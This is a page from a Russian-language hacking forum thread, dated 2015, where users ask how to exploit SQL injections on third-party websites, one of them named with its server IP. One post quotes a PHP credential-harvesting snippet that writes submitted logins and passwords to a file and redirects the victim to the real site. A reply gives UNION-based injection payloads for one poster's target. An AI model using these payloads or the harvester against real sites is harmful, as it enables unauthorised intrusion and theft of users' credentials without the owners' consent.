HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 40 из 296 « Первая < 30 36 37 38 39 40 41 42 43 44 5090140 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #391  
Старый 27.07.2015, 19:50
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
Дальнейшая задача скрипта расположенного на удаленном сервере, заключается в приеме, обработке и сохранении POST параметров login и password. Некоторые ключевые фрагменты скрипта будут иметь следующий вид:

$fd = fopen($file,"a");

fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);

fclose($fd);

echo
"
document.location.replace('
http://www.site.com/auth.html’);
"
----------------------------------------------------------------------------------------------------------------------

как именно нужно прописать этот php?

примерно так?)))
 
Ответить с цитированием

  #392  
Старый 28.07.2015, 10:45
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию
"site.ru/asdasd.php?id=-123'"

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4

Как правильно раскрутить ее.
 
Ответить с цитированием

  #393  
Старый 28.07.2015, 12:00
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от sysjuk  
sysjuk said:

"site.ru/asdasd.php?id=-123'"
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
Как правильно раскрутить ее.
-123+order+by+100+--+

-123+union+select+1,2,3,4,5,6+--+

Всё по стандарту. Никаких аномалий.
 
Ответить с цитированием

  #394  
Старый 28.07.2015, 12:59
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:

-123+order+by+100+--+
-123+union+select+1,2,3,4,5,6+--+
Всё по стандарту. Никаких аномалий.
Так дело в том что ничего не меняется))) Уже все перепробовал)
 
Ответить с цитированием

  #395  
Старый 28.07.2015, 13:17
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от sysjuk  
sysjuk said:

Так дело в том что ничего не меняется))) Уже все перепробовал)
Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.
 
Ответить с цитированием

  #396  
Старый 28.07.2015, 19:05
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию
http://www.toramp.com/schedule.php?id=505' - появляются караракули .

И ничего более .

Единственное что узнал .

Host IP: 109.120.169.82

Web Server: nginx/0.7.67

Powered-by: PHP/5.3.3-7+squeeze14
 
Ответить с цитированием

  #397  
Старый 28.07.2015, 19:13
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию
Эти каракули написаны в кодировке - ISO-8859-5, и расшифровываются как Неверный формат запроса. Проверьте URL.

Простыми словами - Вы получаете сообщение от обработчика ошибок
 
Ответить с цитированием

  #398  
Старый 29.07.2015, 08:35
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию
Цитата:
Сообщение от ocheretko  
ocheretko said:

Эти каракули написаны в кодировке -
ISO-8859-5
, и расшифровываются как
Неверный формат запроса. Проверьте URL.
Простыми словами - Вы получаете сообщение от обработчика ошибок
Благодарю,и это не как,не относится к SQL?Взломать нельзя? . Наверно сайт защищен от SQL .
 
Ответить с цитированием

  #399  
Старый 29.07.2015, 16:53
Genius Black
Guest
Сообщений: n/a
Провел на форуме:
1864

Репутация: 0
По умолчанию
Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 41

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 42

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 43

Query invбlido: select explica from linea_explica where linea = ''''

С этим ничего как я понял нельзя сделать?
 
Ответить с цитированием

  #400  
Старый 29.07.2015, 18:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
зависит от того, что вы хотите сделать.
 
Ответить с цитированием
Ответ
Страница 40 из 296 « Первая < 30 36 37 38 39 40 41 42 43 44 5090140 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ